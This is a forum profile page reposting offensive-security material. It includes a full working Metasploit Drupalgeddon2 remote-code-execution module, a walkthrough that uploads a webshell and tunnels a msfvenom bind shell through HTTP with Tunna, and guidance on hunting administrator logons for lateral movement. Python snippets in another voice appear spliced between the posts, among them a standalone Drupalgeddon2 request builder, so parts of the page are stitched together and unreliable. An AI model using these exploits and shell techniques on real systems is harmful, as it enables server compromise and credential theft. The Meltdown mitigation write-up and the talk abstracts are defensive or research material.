Everything posted by Nytro
“I Hunt Sys Admins”
Published January 19, 2015 by harmj0y

[Edit 8/13/15] Here is how the old version 1.9 cmdlets in this post translate to PowerView 2.0:

Get-NetGroups -> Get-NetGroup
Get-UserProperties -> Get-UserProperty
Invoke-UserFieldSearch -> Find-UserField
Get-NetSessions -> Get-NetSession
Invoke-StealthUserHunter -> Invoke-UserHunter -Stealth
Invoke-UserProcessHunter -> Invoke-ProcessHunter -Username X
Get-NetProcesses -> Get-NetProcess
Get-UserLogonEvents -> Get-UserEvent
Invoke-UserEventHunter -> Invoke-EventHunter

[Note] This post is a companion to the Shmoocon ’15 Firetalks presentation I gave, also appropriately titled “I Hunt Sys Admins”. The slides are here and the video is up on Irongeek. Big thanks to Adrian, @grecs, and all the other organizers, volunteers, and sponsors for putting on a cool event!

[Edit] I gave an expanded version of my Shmoocon talk at BSides Austin 2015; the slides are up here.

One of the most common problems we encounter on engagements is tracking down where specific users have logged in on a network. If you’re in the lateral spread phase of your assessment, this often means gaining some kind of desktop/local admin access and performing the hunt -> pop box -> Mimikatz -> profit pattern. Other times you may have domain admin access and want to demonstrate impact by doing something like owning the CEO’s desktop or email. Knowing which users log in to which boxes, and from where, can also give you a better understanding of the network layout and its implicit trust relationships.

This post will cover various ways to hunt for target users on a Windows network. I’m taking the “assume compromise” perspective, meaning that I’m assuming you already have a foothold on a Windows domain machine. I’ll cover the existing prior art and tradecraft (that I know of) and then show some of the efforts I’ve implemented with PowerView.
I really like the concept of “Offense in Depth”: in short, it’s always good to have multiple options in case you hit a snag at some step in your attack chain. PowerShell is great, but you always need to have backups in case something goes wrong.

Existing Tools and Tradecraft

The Sysinternals tool psloggedon.exe has been around for several years. It “…determines who is logged on by scanning the keys under the HKEY_USERS key” as well as using the NetSessionEnum API call. Admins (and hackers) have used this official Microsoft tool for years. One note: some of its functionality requires admin privileges on the remote machine you’re enumerating.

Another “old school” tool we’ve used in the past is netsess.exe, part of the joeware utilities. It also takes advantage of the NetSessionEnum call and doesn’t need administrative privileges on a remote host. Think of it as a “net session” that works against remote machines.

PVEFindADUser.exe is a tool released by the awesome @corelanc0d3r in 2009. Corelanc0d3r talks about the project here. It can help you find AD users, including enumerating the last logged-in user for a particular system. However, you do need admin access on the machines you’re running it against.

Rob Fuller’s (@mubix) netview.exe project is a tool we’ve used heavily since its release at Derbycon 2012. It’s a tool to “enumerate systems using WinAPI calls”. It utilizes NetSessionEnum to find sessions, NetShareEnum to find shares, and NetWkstaUserEnum to find logged-on users. It can now also check share access, highlight high-value users, and use a delay/jitter. You don’t need administrative privileges to get most of this information from a remote machine.

Nmap’s flexible scripting engine also gives us some options. If you have a valid domain account, or a local account valid on several machines, you can use smb-enum-sessions.nse to get session information from a remote box. And you don’t need admin privileges!
If you have access to a user’s internal email, you can also glean some interesting information from internal email headers. Search for any chains to/from target users, and check the headers of those email chains. The “X-Originating-IP” header is often present and can let you trace where a user sent a given email from.

Scott Sutherland (@_nullbind) wrote a post in 2012 highlighting a few other ways to hunt for domain admin processes. Check out techniques 3 and 4, where he details other ways to scan remote machines for specific process owners, as well as how to scan for NetBIOS information of interest using nbtscan. For remote task listings, you’ll need local administrator permissions on the targets you’re going after. We’ll return to this in the PowerShell section.

And finally, Smbexec has a checkda module which will check systems for domain admin processes and/or logins. Veil-Pillage takes this a step further with its user_hunter and group_hunter modules, which give you flexibility beyond just domain admins. For both Smbexec and Veil-Pillage, you will need admin rights on the remote hosts.

Active Directory: It’s a Feature!

Active Directory is an awesome source of information from both offensive and defensive perspectives. One of the biggest turning points in the evolution of my tradecraft was when I began to learn just how much information AD can give up. Various user fields in Active Directory can give you some great starting points to track down users. The homeDirectory property, which contains the path to a user’s auto-mounted home drive, can give you a good number of file servers. The profilePath property, which contains a user’s roaming profile, can sometimes give you a few servers to check out as well. Try running something like netsess.exe or netview.exe against these remote servers. The key here is that you’re using AD information to identify servers that several users are likely connected to.
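The header trick above is easy to automate. A small Python sketch that pulls X-Originating-IP out of a raw message with the standard library (the sample message here is made up):

```python
from email import message_from_string

# A made-up raw message; in practice this would come from a
# target user's mailbox (e.g. an exported .eml file).
raw = """\
From: ceo@corp.local
To: admin@corp.local
Subject: budget
X-Originating-IP: [10.4.2.17]
Date: Mon, 19 Jan 2015 09:00:00 -0500

See attached.
"""

msg = message_from_string(raw)
# The header value is commonly bracketed; strip that off.
origin = msg.get("X-Originating-IP", "").strip("[] ")
print(origin)  # -> 10.4.2.17
```

Run over a mailbox export, this quickly maps which internal addresses a target user sends mail from.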
And the best part is, you don’t need any elevated privileges to query this type of user information!

Also, Scott wrote another cool post early in 2014 on using service principal names to find locations where domain admin accounts might be. In short, you can use Scott’s Get-SPN PowerShell script to enumerate all servers where domain admins are registered to run services. I highly recommend checking it out for more information. This is also something that the prolific Carlos Perez talked about at Derbycon 2014.

Once you get domain admin but still want to track down particular users, Windows event logs can be a great place to check as well. One of my colleagues (@sixdub) wrote a great post on offensive event parsing for the purposes of user hunting. We’ll return to this shortly.

PowerShell PowerShell PowerShell

Anyone who’s read this blog or seen me speak knows that I won’t shut up about PowerShell, Microsoft’s handy post-exploitation language. PowerShell has some awesome AD hooks and various ways to access the lower-level Windows API. @mattifestation has written about several ways to interact with the Windows API through PowerShell here, here, and here. His most recent release, PSReflect, makes it super easy to play with this lower-level access. This is something I’ve written about before.

PowerView is a PowerShell situational-awareness tool I’ve been working on for a while that includes a few functions to help you hunt for users. To find users to target, Get-NetGroups *wildcard* will return groups containing specific wildcard terms. Also, Get-UserProperties will extract all user property fields, and Invoke-UserFieldSearch will search particular user fields for wildcard terms. This can sometimes help you narrow down the users to hunt for.
For example, we’ve used these functions to find the Linux administrators group and its associated members, so we could then hunt them down and keylog their PuTTY/SSH sessions.

The Invoke-UserHunter function can help you hunt for specific users on the domain. It accepts a username, user list, or domain group, and accepts a host list or queries the domain for available hosts. It then runs Get-NetSessions and Get-NetLoggedon against every server (using the NetSessionEnum and NetWkstaUserEnum API functions) and compares the results against the target user set. Everything is flexible, letting you define who to hunt for, and where. Again, admin privileges are not needed.

Invoke-StealthUserHunter can get you good coverage with less traffic. It issues one query to get all users in the domain, extracts all servers from the users’ home directories, and runs Get-NetSessions against each resulting server. As you aren’t touching every single machine like with Invoke-UserHunter, this traffic will be more “stealthy”, but your machine coverage won’t be as complete. We like to use Invoke-StealthUserHunter as a default, falling back to its noisier brother if we can’t find what we need.

A recently added PowerView function is Invoke-UserProcessHunter. It utilizes the newly christened Get-NetProcesses cmdlet to enumerate the process lists of remote machines, searching for target users. You will need admin access to the machines you’re enumerating.

The last user-hunting function in PowerView is the weaponized version of @sixdub’s post described above. The Get-UserLogonEvents cmdlet will query a remote host for logon events (ID 4624). Invoke-UserEventHunter wraps this up into a method that queries all available domain controllers for logon events linked to a particular user. You will need domain admin access in order to query these events from a DC.

If I missed any tools or approaches, please let me know!

Source: http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
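The core matching loop of the user-hunting functions above is simple: enumerate sessions per host and intersect them with a target set. A stripped-down, pure-Python model of that logic (the session data here is hard-coded for illustration; PowerView gets it from NetSessionEnum/NetWkstaUserEnum):

```python
def hunt_users(targets, session_source):
    """Return {host: sorted usernames} for hosts where a target user
    has a session. `session_source` maps host -> iterable of usernames
    (in PowerView this comes from Get-NetSession / Get-NetLoggedon)."""
    targets = {t.lower() for t in targets}
    hits = {}
    for host, users in session_source.items():
        found = sorted({u for u in users if u.lower() in targets})
        if found:
            hits[host] = found
    return hits

# Illustrative data only: hosts and the users seen logged on to them.
sessions = {
    "FILESERVER1": ["bob", "ADMINISTRATOR", "carol"],
    "WKSTN-07": ["dave"],
    "SQL01": ["administrator"],
}

print(hunt_users(["Administrator"], sessions))
# -> {'FILESERVER1': ['ADMINISTRATOR'], 'SQL01': ['administrator']}
```

Case-insensitive comparison matters here, since AD usernames come back in inconsistent casing across APIs.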
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Drupalgeddon2',
      'Description'    => %q{
        CVE-2018-7600 / SA-CORE-2018-002
        Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x
        before 8.5.1 allows remote attackers to execute arbitrary code because
        of an issue affecting multiple subsystems with default or common module
        configurations.

        The module can load msf PHP arch payloads, using the php/base64 encoder.
        The resulting RCE on Drupal looks like this:
        php -r 'eval(base64_decode(#{PAYLOAD}));'
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Vitalii Rudnykh',    # initial PoC
          'Hans Topo',          # further research and ruby port
          'José Ignacio Rojo'   # further research and msf module
        ],
      'References'     =>
        [
          ['SA-CORE', '2018-002'],
          ['CVE', '2018-7600'],
        ],
      'DefaultOptions' =>
        {
          'encoder' => 'php/base64',
          'payload' => 'php/meterpreter/reverse_tcp',
        },
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => [ARCH_PHP],
      'Targets'        =>
        [
          ['User register form with exec', {}],
        ],
      'DisclosureDate' => 'Apr 15 2018',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
      ])

    register_advanced_options(
      [
      ])
  end

  def uri_path
    normalize_uri(target_uri.path)
  end

  def exploit_user_register
    data = Rex::MIME::Message.new
    data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"')
    data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"')
    data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"')
    data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"')
    data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"')
    post_data = data.to_s

    # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
    send_request_cgi({
      'method'   => 'POST',
      'uri'      => "#{uri_path}user/register",
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data,
      'vars_get' => {
        'element_parents' => 'account/mail/#value',
        'ajax_form'       => '1',
        '_wrapper_format' => 'drupal_ajax',
      }
    })
  end

  ##
  # Main
  ##

  def exploit
    case datastore['TARGET']
    when 0
      exploit_user_register
    else
      fail_with(Failure::BadConfig, "Invalid target selected.")
    end
  end
end

Source: https://www.exploit-db.com/exploits/44482/
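To make the request shape the module sends more concrete, here is a hypothetical standalone Python sketch that assembles the same multipart form and query string (it only builds the request; everything here is illustrative, and the `command` argument stands in for the PHP payload):

```python
from urllib.parse import urlencode

def build_drupalgeddon2_request(base, command, boundary="MsfBound"):
    """Build (url, content_type, body) mirroring the module's
    user_register_form abuse for CVE-2018-7600."""
    params = urlencode({
        "element_parents": "account/mail/#value",
        "ajax_form": "1",
        "_wrapper_format": "drupal_ajax",
    })
    url = "%s/user/register?%s" % (base.rstrip("/"), params)
    # Same form parts as the module's Rex::MIME::Message.
    fields = [
        ("mail[#markup]", command),
        ("mail[#type]", "markup"),
        ("form_id", "user_register_form"),
        ("_drupal_ajax", "1"),
        ("mail[#post_render][]", "exec"),
    ]
    parts = []
    for name, value in fields:
        parts.append("--%s\r\n"
                     'Content-Disposition: form-data; name="%s"\r\n'
                     "\r\n%s\r\n" % (boundary, name, value))
    body = "".join(parts) + "--%s--\r\n" % boundary
    ctype = "multipart/form-data; boundary=%s" % boundary
    return url, ctype, body

url, ctype, body = build_drupalgeddon2_request("http://victim.example", "id")
```

The key detail is visible in `fields`: the renderable array's `#post_render` callback is set to `exec`, so Drupal runs the `#markup` string as a shell command when it renders the AJAX response.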
Interactive bindshell over HTTP
By Kevin, April 18, 2018

Primitives needed: a webshell on a webserver.

Intro

What do you do when you have exploited a webserver and really want an interactive shell, but the network has zero open ports and the only way in is through HTTP port 80 on the webserver you’ve exploited? The answer is simple: tunnel your traffic inside HTTP using the existing webserver.

We previously ran into this issue and had some messy solutions, and sometimes just an open port by luck. Therefore we wanted a more generic approach that could be reused every time we have a webshell. We started writing a tool called webtunfwd which did what we wanted. It listened on a local port on our attacking machine, and when we connected to that local port, it would POST whatever was inside socket.recv to the webserver. The webserver would then take whatever was sent inside this POST request and feed it into the socket connection on the victim.

Note: The diagram below is taken from the Tunna project’s GitHub.

So this is a little walkthrough of what happens:

1. Attacker uploads webtunfwd.php to the victim, which is now reachable at victim:80/webtunfwd.php
2. Attacker uploads his malware and/or a meterpreter bindshell, which listens on localhost:20000
3. Victim is now listening on localhost:20000
4. Attacker calls webtunfwd.php?broker, which connects to localhost:20000 and keeps the connection open
5. webtunfwd.php?broker reads from the socket and writes the data to a temp file we’ll call out.tmp
6. webtunfwd.php?broker reads from a temp file we’ll call in.tmp and writes the data to the socket

Great. Now we have webtunfwd.php?broker, which handles the socket connection on the victim side and keeps it open forever. We now need to write to and read from the two files in.tmp and out.tmp, respectively, from our attacking machine.
This is handled by our Python script local.py:

1. Attacker runs local.py on his machine, which listens on localhost:11337
2. Attacker now connects with the meterpreter client to localhost:11337
3. When local.py receives the connection it creates two threads, one for reading and one for writing
4. The read thread reads from the socket and writes to in.tmp by sending a POST request with the data to webtunfwd.php?write
5. The write thread reads from out.tmp by sending a GET request to webtunfwd.php?read and writes the result to the socket

So with this code we now have dynamic port forwarding through HTTP, and we can run whatever payload on the server we want. But after writing this tool we searched Google a little and found that a tool called Tunna was written for this exact purpose by a company called SECFORCE. So instead of reinventing the wheel by publishing our own tool, which didn’t get nearly as much love as the Tunna project did, we’re going to show how Tunna is used in action with a bind shell.

Systems setup

Victim -> Windows 2012 server
Attacker -> Some Linux distro

Prerequisites

The ability to upload a shell to a webserver.

Setting up Tunna

The first thing we need to do in order to set up Tunna is to clone the git repository. On the attacking machine run:

git clone https://github.com/SECFORCE/Tunna

This project contains quite a few files. The ones we are going to use are proxy.py and the contents of the webshells folder. In order for Tunna to work, we first upload the webshell that will handle the proxy connection/port forwarding to the victim machine. In the webshells folder you’ll find conn.aspx: use whatever method or vulnerability you are exploiting to get it onto the machine. From now on we’re going to assume that the shell conn.aspx is placed at http://victim.com/conn.aspx. Tunna is now set up and ready to use.

Generating a payload

We’re now going to generate our backdoor, which is a simple shell, via Metasploit.
The shell is going to listen on localhost:12000, which could be any port on localhost, as we’ll connect to it through Tunna. As we want to run our shell on a Windows server running ASPX, we build our backdoor in ASPX format with msfvenom:

msfvenom --platform Windows -a x64 -p windows/x64/shell/bind_tcp LPORT=12000 LHOST=127.0.0.1 -f aspx --out shell.aspx

--platform  Target platform
-a          Target architecture
-p          Payload to use
LPORT       The port to listen on, on the target
LHOST       The IP we are listening on
-f          The output format of the payload
--out       Where to save the file

After running this command we should have shell.aspx. In the same way that we uploaded conn.aspx, we upload shell.aspx. So now we assume that you have the following two files available:

http://victim.com/conn.aspx
http://victim.com/shell.aspx

Launching the attack

So everything is set up: Tunna is uploaded to the server and we have our backdoor ready. The first thing we do is browse to http://victim.com/shell.aspx. After running netstat -na we can see that our shell is listening on port 12000 on the victim machine.

Now we move to our attacking machine. We need two things to connect: proxy.py from Tunna, and our Metasploit console. First we forward the local port 10000 to port 12000 on the remote host with the following command:

python proxy.py -u http://target.com/conn.aspx -l 10000 -r 12000 -v --no-socks

-u          The target URL with the path to the uploaded webshell
-l          The local port to listen on, on the attacking machine
-r          The remote port to connect to, on the victim machine
-v          Verbosity
--no-socks  Do not create a SOCKS proxy; only port forwarding is needed

The output will look like the following while it awaits connections:

The attacking machine now listens locally on port 10000 and we can connect to it through Metasploit. To do this we configure Metasploit as follows, and after that is done we enter run. We should now get a shell. The Tunna status terminal will look like this:

Conclusions

A full TCP connection wrapped in HTTP in order to evade strict firewalls and the like. We could have exchanged our plain shell for anything we wanted, as Tunna simply forwards the port for us.

Performance suggestions for projects like Tunna

We’ve experimented with some performance upgrades to the Tunna project. One thing we did not like was the number of HTTP GET/POST requests sent to and from the server. Our solution was to use Transfer-Encoding: chunked. This enabled us to open a GET request, receive bytes whenever they were ready, and then wait for the next read from the socket without ever closing the GET request. We researched many ways to do this over POST towards the server, but we couldn’t seem to circumvent the internal buffering that web servers like Apache apply to received chunks, which was set to 8192 bytes.

Source: http://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/
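The chunked-encoding idea above is easy to sketch: each socket read becomes a size-prefixed chunk on one long-lived response, and a zero-length chunk terminates the stream only when the tunnel is torn down. A minimal encoder (illustrative only, not Tunna code):

```python
def encode_chunk(data: bytes) -> bytes:
    """Encode one HTTP/1.1 chunk: hex length, CRLF, payload, CRLF."""
    return b"%x\r\n%s\r\n" % (len(data), data)

def chunked_stream(chunks):
    """Yield a chunked body for an open GET response; the empty
    terminating chunk is only emitted when the tunnel closes."""
    for data in chunks:
        yield encode_chunk(data)
    yield b"0\r\n\r\n"

body = b"".join(chunked_stream([b"hello", b" world"]))
print(body)  # -> b'5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n'
```

Because the response stays open between chunks, the client needs only one GET for the whole download direction instead of one request per poll, which is where the request-count savings come from.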
Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
Hooking Chrome’s SSL functions
ON 26 FEBRUARY 2018 BY NYTROSECURITY

The purpose of NetRipper is to capture functions that encrypt or decrypt data and send it through the network. This is easily achieved for applications such as Firefox, where it is enough to find two DLL-exported functions, PR_Read and PR_Write, but it is much more difficult for Google Chrome, where the SSL_Read and SSL_Write functions are not exported. The main problem for someone who wants to intercept such calls is that we cannot easily find the functions inside the huge chrome.dll file, so we have to locate them manually in the binary. But how can we do it?

Chrome’s source code

In order to achieve our goal, the best starting point might be Chrome’s source code, available at https://cs.chromium.org/. It allows us to easily search and navigate through the source code.

Full article: https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/
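One common way to locate a non-exported function like this is to scan the module for a byte signature taken from its prologue, with wildcards over bytes (such as relative addresses) that change between builds. A small, generic Python sketch of such a scan (the signature below is made up for illustration, not a real chrome.dll pattern):

```python
def find_signature(data: bytes, pattern: list) -> int:
    """Return the offset of the first match of `pattern` in `data`.
    `pattern` is a list of ints (exact byte) or None (wildcard).
    Returns -1 if not found."""
    plen = len(pattern)
    for i in range(len(data) - plen + 1):
        if all(p is None or data[i + j] == p
               for j, p in enumerate(pattern)):
            return i
    return -1

# Hypothetical prologue: push rbp; mov rbp, rsp; mov eax, [rip+disp];
# the 4-byte displacement is wildcarded since it differs per build.
sig = [0x55, 0x48, 0x89, 0xE5, 0x8B, None, None, None, None, 0xC3]
blob = bytes([0x90, 0x90]) + bytes([0x55, 0x48, 0x89, 0xE5,
                                    0x8B, 0x05, 0x44, 0x33, 0x22, 0xC3])
print(find_signature(blob, sig))  # -> 2
```

In practice the signature is derived by compiling the matching BoringSSL sources, or by diffing debug builds, and the found offset is then used as the hook target.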
Nginx 1.13.10 Accept-Encoding Line Feed Injection Exploit
Nytro replied to KRONZY.'s topic in Exploituri
1. Stack-based buffer overflow. 2. What is the result of this exploit?
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/
From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886]

In the March 2018 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability discovered by Preempt. This vulnerability can be classified as a logical remote code execution (RCE) vulnerability. It consists of a design flaw in CredSSP, a Security Support Provider involved in Microsoft Remote Desktop and Windows Remote Management (including PowerShell sessions). An attacker with complete man-in-the-middle (MITM) control over such a session can abuse it to run arbitrary code on the target server on behalf of the user! This vulnerability affects all Windows versions.

Download this white paper to learn:

How Preempt researchers found the vulnerability
How we were able to exploit the authentication in MS-RDP
What you need to do to protect your organization

Download now.

Source: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
KVA Shadow: Mitigating Meltdown on Windows
swiat, March 23, 2018

On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow, which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”).

KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post.

Vulnerability description & background

The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by way of raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode code.
Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architectural state of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time.

Out-of-order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or otherwise may have left additional traces of their execution in the processor’s caches.

This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory.

Operating system implications

Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode.
A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. 
This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. 
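A toy model can make the two-address-space scheme concrete. Here each “address space” is just a set of mapped pages: the shadow user space contains the process’s user pages plus only the “safe” transition pages, while the kernel space maps everything. This is purely illustrative and nothing in it is Windows-specific:

```python
# Pages in a hypothetical process, tagged by sensitivity.
KERNEL_PAGES = {
    "kernel_pool_data": "sensitive",      # must never be user-visible
    "thread_kernel_stack": "sensitive",
    "trap_transition_code": "safe",       # needed to enter/exit the kernel
    "gdt_idt_tss": "safe",
}
USER_PAGES = {"app_code", "app_heap", "app_stack"}

# Kernel address space: everything is mapped.
kernel_space = USER_PAGES | set(KERNEL_PAGES)

# Shadow user address space: user pages plus only the "safe"
# transition pages, so a Meltdown-style read finds nothing sensitive.
user_space = USER_PAGES | {p for p, kind in KERNEL_PAGES.items()
                           if kind == "safe"}

assert "kernel_pool_data" not in user_space   # nothing sensitive to leak
assert "trap_transition_code" in user_space   # kernel entry still works
```

The cost the post goes on to describe follows directly from this model: every user/kernel transition must switch between the two mappings, and only the pages in the shadow set may participate in that switch.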
On a historical note, some operating systems have previously implemented similar mechanisms for a variety of different and unrelated reasons. For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel to provide a 4GB virtual address space to user mode and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels.

KVA shadow implementation in the Windows kernel

While the design requirements of KVA shadow may seem relatively innocuous (privileged kernel-mode memory must not be mapped in to the address space when untrusted user mode code runs), the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes the maintainability of code in both KVA shadow and non-KVA-shadow configurations.
This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures. This is due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling.

Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation.

The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode.

Trap handling and system service call dispatching overview and retrospective

As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors: traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load up on a ring transition to ring 0 (kernel mode) code.
This field is traditionally updated by the kernel on context switch, and on several other related internal events; when a switch to a different thread occurs, the processor's KTSS64.Rsp0 field is updated to point to the base of the new thread's kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread's stack. The exception to this rule is that of system service calls, which typically enter the kernel with a "syscall" instruction; this instruction does not switch the stack pointer, and it is the responsibility of the operating system trap handling code to manually load up an appropriate kernel stack pointer.

On typical kernel entry, the hardware has already pushed what is termed a "machine frame" (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt-return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags of the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread.

KVA shadow trap and system service call dispatching design considerations

With a basic understanding of how traps are handled without KVA shadow, let's dive into the details of the KVA shadow-specific considerations of trap handling in the kernel.
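The machine frame itself has a fixed, hardware-defined shape: five 8-byte slots (return RIP, CS, RFLAGS, RSP, SS) pushed by the processor on a ring transition and popped by IRETQ. A minimal ctypes sketch of that shape (the field names here are illustrative, not the exact Windows MACHINE_FRAME definition):

```python
import ctypes

class MACHINE_FRAME(ctypes.LittleEndianStructure):
    """Model of the five 8-byte slots the CPU pushes on a ring transition
    and that IRETQ later consumes to return to the interrupted context.
    Field names are illustrative; the real kernel definition may differ."""
    _fields_ = [
        ("Rip",    ctypes.c_uint64),  # return address in the interrupted code
        ("SegCs",  ctypes.c_uint64),  # code segment of the interrupted code
        ("EFlags", ctypes.c_uint64),  # processor flags
        ("Rsp",    ctypes.c_uint64),  # stack pointer of the interrupted code
        ("SegSs",  ctypes.c_uint64),  # stack segment
    ]

assert ctypes.sizeof(MACHINE_FRAME) == 40  # 5 qwords pushed by hardware
```

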